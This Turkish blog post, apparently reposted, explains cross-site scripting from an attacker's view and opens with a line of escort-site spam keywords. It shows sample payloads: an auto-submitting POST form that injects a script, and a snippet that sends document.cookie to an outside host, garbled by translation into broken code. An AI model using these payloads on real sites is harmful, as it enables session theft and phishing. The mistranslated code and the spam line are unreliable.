istanbul escort şişli escort antalya escort fatih escort taksim escort halkalı escort avcılar escort bursa escort beylikdüzü escort kadıköy escort mecidiyekoy escort izmir escort atasehir escort umraniye escort

Saldırgan gözüyle xss saldırısı

XSS nedir ve kendini bundan nasıl koruyacağını herkes çoktan biliyor, ondan dolayı kısaca tanıtacağım. XSS belirli bir şekilde ( aşağıdaki bağlantı da bütün varyantları görebilirsiniz ) mağdur kişinin web-sitesine bir betik yerleştirerek, sitesini ziyaret ettiğinde o dosya saldırı görevini gerçekleştirmiş olur.

İlginç olan şey, çoğu durumlarda, bu güvenlik açığını açıkladığında, aşağıdaki kod ile bizi korkutmaya çalışılır:

| http://www.site.com/page.php?var=<script>alert(‘xss’);</script>

Fazla korkutucu gelmiyor bana:) Güvenlik açığı gerçekten ne açıdan tehlikeli olabilir?

Pasif ve aktif

XSS iki tür güvenlik açığı var : pasif ve aktif.

Aktif güvenlik açığı, saldırgan tarafından mağdur kişi için özel bir bağlantı aracığıyla tuzak kurması gerek olmadığı için daha da tehlikelidir, veri tabanına kod enjekte etmesi, veya server üzerinde herhangi bir dosya yerleştirmesi yeterlidir. Böylece, sitenin tüm ziyaretçileri otomatik olarak kurban olurlar. Bu, örneğin, SQL kodu (SQL İnjection) kullanarak, entegre edilebilir. Bu nedenle, BD de yer alan, yerleştirmeden önce işlenen verilere bile güvenmiyorum.

Bu makalenin başında pasif güvenlik açığı örneği görülebilir. Burada artık sosyal mühendisliğine ihtiyaç var, örneğin, geri yedekleme yapıldıktan sonra, sitenin yönetimine hesap ayarlarınızı kontrol etmelerini içeren önemli bir mektup göndermeniz gerekiyor. Buna göre mağdur kişinin e-mail adresini bilmeniz veya sadece bir spam e-posta düzenlenebilir veya forumda bir paylaşım (post) yapılabilir, ama gerçi kurbanlar saf olmayıp, bağlantınız üzerine tıklamaya da bilir.

Ama pasif güvenlik açığı hem POST hem de GET- parametrelerin tehlikesine maruzdur. POST parametrelerinde, tabii ki, manevra kullanmak gerekecek. Örneğin, saldırganın sitesinden geri yönlendirme yaparak.

<form method=”post” action=”http://site.com/page.php”>

<input type=”hidden” name=”var” value=”<script>alert(‘xss’)</script>”>

</form>

<script type=”text/javascript”>

document.getElementsByTagName(‘form’)[0].submit();

</script>

Sonuç olarak, GET-güvenlik açığı biraz daha tehlikeli, çünkü mağdur kişinin yanlış domaini değiştirmek, ek parametriyi değişmesinden kolaydır. (ancak url kodlaması da mümkün )

Cookies bilgilerin çalınması

Bu XSS saldırının en sık rastlanan örneğidir. Cookies bilgilerinde siteler bazen bazı değerli bilgiyi saklar (hatta bazen oturum bilgileri ve kullanıcının parolasını (veya onun hash fonksiyonunu) ama en tehlikelisi aktif oturumdur, bir ev bilgisayarı olsa bile sitelerden, “çıkış” linkine tıklamayı unutmayın. Neyse ki, çoğu oturumların süresi sınırlıdır.

var ìmg = yeni görüntü ();

ìmg. srs = ‘ http://site/xss.php? ‘ + document.cookie;

Bu nedenle domainlerin XMLHttpRequest üzerinde kısıtlamasını yaptılar, ama bu saldırganı korkutmaz, çünkü : <iframe>, <img>, <script>, background:url() var.

getElementById üzerinden formu arıyoruz, ve onsubmit olayı takip edebiliyoruz. Şimdi, form gönderilmeden önce girilen veriler kötü amaçlı kullanıcının serverine de gönderilir. Bu tür saldırılar yemlemeye benzer bir şeydir, tek fark ise sahte bir site yerine gerçek olan kullanılır, ve bunun sayesinde maruz kişinin tarafından daha fazla güven kazanılır.

DDoS saldırısı (hizmet reddi gibi dağıtılmış saldırı)

XSS açığı sık ziyaret edilen kaynaklarında DDoS saldırısı için kullanılabilir. Özü basittir — servere kaldıramayacak kadar istek gönderilmesi.

Ama XSS fazla alakası yok, çünkü betik kullanılmaya da bilir, bu yapı yeterli olur:

Siteler arası istekler sahteciliği (CSRF/XSRF)

Aynı şekilde XSS ile fazla alakası yok. Bu güvenlik açığının tamamen ayrı bir türüdür, ancak XSS ile birlikte sık kullanılır. Özü şudur ki, kullanıcı, güvenli Web sitesinde oturumu olan, savunmasız bir siteyi ziyaret ederek (saldırganın özel sayfasına girerek), üzerinden belirli eylemleri gerçekleştirmek için istek gönderilir.

Kısaca söylersek, en ideali böyle olması gerekiyor. Kullanıcı ödeme sisteminde kayıt oldu. Sonra saldırganın sitesini veya XSS açığı olan bir siteden saldırganın hesabına para transferi isteği gönderilen siteyi ziyaret etti.

Bu nedenle, kullanıcının belirli eylemleri gerçekleştirirken sitelerin çoğu (örneğin e-posta değişikliği) parolayı ya da doğrulayıcı şifreyi sorar.

XSS bilgisayar solucanlar

Bu tür saldırısı, muhtemelen Vkontakte ve Twitter gibi sosyal medyalardan dolayı ortaya çıktı. Sonuç olarak, birden çok kullanıcıya XSS açığı taşıyan bağlantı gönderilir, bu bağlantıya tıkladıklarında, onların adından entegre edilmiş betik başka kullanıcılara mesaj göndermiş olur. Aynı şekilde, saldırgana özel bilgiler gönderilmesi gibi başka eylemler de gerçekleşe bilir.

Zararsız bir XSS

İlginç olan şey, sayaçlar da aslında aynı zamanda XSS saldırısının bir türüdür. Çünkü IP adresi, ekran çözünürlüğü, ziyaretçinin bilgileri gibi servere aktarılır. Bitek sayfanızın kodunu kendi isteğinizle aktarabilirsiniz:) Örneğin, Google Analitik koduna bir göz atın.

xss saldırısı
xss saldırısı

Aynı zamanda crossdomain AJAX istekleri de zararsız XSS sayılır.

 

Kaynak: http://blog.kanije.com.tr/saldirgan-gozuyle-xss-565632/

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir